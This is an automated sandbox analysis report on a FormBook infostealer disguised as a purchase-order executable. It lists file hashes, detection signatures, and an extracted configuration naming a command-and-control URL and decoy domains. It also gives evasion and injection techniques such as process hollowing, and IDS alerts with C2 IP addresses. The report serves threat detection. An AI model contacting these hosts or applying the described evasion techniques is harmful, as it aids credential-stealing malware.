Analysis Report PO45937008ADENGY.exe

Overview

General Information

Sample Name: PO45937008ADENGY.exe
Analysis ID: 383974
MD5: 47ebf3893d8d6db4add1b87ad75495e4
SHA1: a90970359da16dfbcf89648f7a38fb75707181b3
SHA256: ee54b187c42f159bfba469c4b8c5ba0a85afeb802ea7eacaf400ccb38f7183af
Tags: exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.hnchotels.com/mb7q/"], "decoy": ["thezensub.com", "wapedir.com", "itt.xyz", "mindframediscovery.com", "sitesolved.net", "beyju.store", "belatopapparel.xyz", "ridgefitct.com", "huanb.com", "brustwarzentattoo.com", "jlasoluciones.club", "sinoagrifcf.com", "theskineditco.com", "ccsdinstructer.com", "wealththinker.com", "pradnyanamaya.com", "szmsbk.com", "meezingo.com", "ivyshermanboutique.com", "tkbeads.com", "network70.com", "viralofilia.com", "eversteve.com", "softballlyfe.com", "fashionpulos.com", "myfashionest.com", "thelandcle.com", "xuuxacademy.com", "shopbijousecrets.com", "ynlklwsx.icu", "mtasa.blue", "covid19officers.com", "bookitstaugustine.com", "kuppers.info", "therapeuticsmile.com", "bestsocialprograms.com", "alergiaalfrio.com", "hepimizdostuz.com", "shubharambh-gifts.com", "drmellilo.com", "visaad.com", "caseysisters.com", "accessibleageing.com", "tokoryan.online", "databasement.net", "penstockdistillery.com", "payelll.com", "rockinghampress.com", "tuyensinhhaiphong.com", "myrecordsinfo.com", "thegarnetts.vegas", "veganktichen.com", "helpmewithmyenergy.com", "tootywooty.com", "walmartadvisors.com", "atrangii.com", "sceantez.com", "namigwe.art", "davidkellywvhouse6.com", "richardyg.com", "pasouth.com", "theblockparq.com", "merkuryindustries.com", "solidgroundsministries.com"]}
Multi AV Scanner detection for submitted file
Source: PO45937008ADENGY.exe Virustotal: Detection: 27% Perma Link
Source: PO45937008ADENGY.exe ReversingLabs: Detection: 25%
Yara detected FormBook
Source: Yara match File source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 9.2.PO45937008ADENGY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.PO45937008ADENGY.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: PO45937008ADENGY.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 9.2.PO45937008ADENGY.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen2

Compliance:

barindex
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.21.56.119:443 -> 192.168.2.4:49727 version: TLS 1.0
Source: PO45937008ADENGY.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
Source: Binary string: onfiguration.ni.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: System.ni.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000D.00000003.670335958.0000000004C32000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: onfiguration.ni.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: PO45937008ADENGY.exe, WerFault.exe, 0000000D.00000003.670367883.0000000000C45000.00000004.00000001.sdmp, wlanext.exe
Source: Binary string: crypt32.pdb_ source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: winnsi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: clr.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: .ni.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: PO45937008ADENGY.PDB source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: schannel.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000D.00000003.671537664.0000000000C57000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: WLDP.pdb/ source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
Source: Binary string: System.Windows.Forms.pdb< source: WER15F6.tmp.dmp.13.dr
Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: rasapi32.pdb| source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: System.Core.pdb( source: WER15F6.tmp.dmp.13.dr
Source: Binary string: CLBCatQ.pdb= source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000D.00000003.688645391.0000000005190000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdbu source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbn source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: mscorsecimpl.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdb! source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: shell32.pdbn source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000C.00000000.688286322.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdbP source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: nsi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdbUGP source: PO45937008ADENGY.exe, 00000009.00000003.664621972.0000000001160000.00000004.00000001.sdmp, wlanext.exe, 00000011.00000002.915414593.0000000003A1F000.00000040.00000001.sdmp
Source: Binary string: ncrypt.pdbk source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdbRSDS source: WER15F6.tmp.dmp.13.dr
Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: ole32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbps; source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
Source: Binary string: imagehlp.pdby source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb_ source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: mscorlib.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: propsys.pdbm source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: comctl32v582.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: iVisualBasic.pdb source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000D.00000003.670642715.0000000000C51000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER15F6.tmp.dmp.13.dr
Source: Binary string: ncrypt.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: secur32.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: rasman.pdbv source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000D.00000003.688645391.0000000005190000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdbRSDS source: WER15F6.tmp.dmp.13.dr
Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: ml.ni.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: .pdb= source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: System.Core.ni.pdbRSDSD source: WER15F6.tmp.dmp.13.dr
Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb7 source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: rsaenh.pdbz source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: ml.ni.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: Kernel.Appcore.pdb! source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: dhcpcsvc6.pdbQ source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: wlanext.pdb source: PO45937008ADENGY.exe, 00000009.00000002.716498017.0000000002F80000.00000040.00000001.sdmp
Source: Binary string: t.VisualBasic.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: wUxTheme.pdbs source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: .pdb+ source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
Source: Binary string: cldapi.pdbC source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: shell32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: winhttp.pdb; source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: edputil.pdbI source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: Microsoft.VisualBasic.pdb\F1 source: WER15F6.tmp.dmp.13.dr
Source: Binary string: iLC:\Windows\Microsoft.VisualBasic.pdb source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000000D.00000003.688216819.00000000051AD000.00000004.00000040.sdmp
Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: imagehlp.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: ntasn1.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000000D.00000003.688216819.00000000051AD000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: wgdi32full.pdb` source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: clrjit.pdbR source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: System.ni.pdbT3 source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: rtutils.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: System.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: Windows.Storage.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000D.00000003.670367883.0000000000C45000.00000004.00000001.sdmp
Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER15F6.tmp.dmp.13.dr
Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: rasman.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc.pdbg source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb` source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: version.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: System.Xml.pdb source: WER15F6.tmp.dmp.13.dr
Source: Binary string: System.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: wscui.pdb source: explorer.exe, 0000000C.00000000.688286322.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: psapi.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: cldapi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000D.00000003.671537664.0000000000C57000.00000004.00000001.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: System.Core.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: powrprof.pdbT source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: System.Xml.pdb? source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbJ source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: C:\Users\user\Desktop\PO45937008ADENGY.PDB source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
Source: Binary string: wlanext.pdbGCTL source: PO45937008ADENGY.exe, 00000009.00000002.716498017.0000000002F80000.00000040.00000001.sdmp
Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: edputil.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 4x nop then pop esi 9_2_00415836
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 4x nop then pop edi 9_2_0040C3E8
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 4x nop then pop edi 17_2_02EDC3E8
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 4x nop then pop esi 17_2_02EE5836

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49745 -> 185.199.108.153:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49745 -> 185.199.108.153:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49745 -> 185.199.108.153:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49762 -> 52.15.160.167:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49762 -> 52.15.160.167:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49762 -> 52.15.160.167:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 81.88.57.70:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 81.88.57.70:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 81.88.57.70:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 85.17.172.1:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 85.17.172.1:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 85.17.172.1:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 123.31.43.181:80
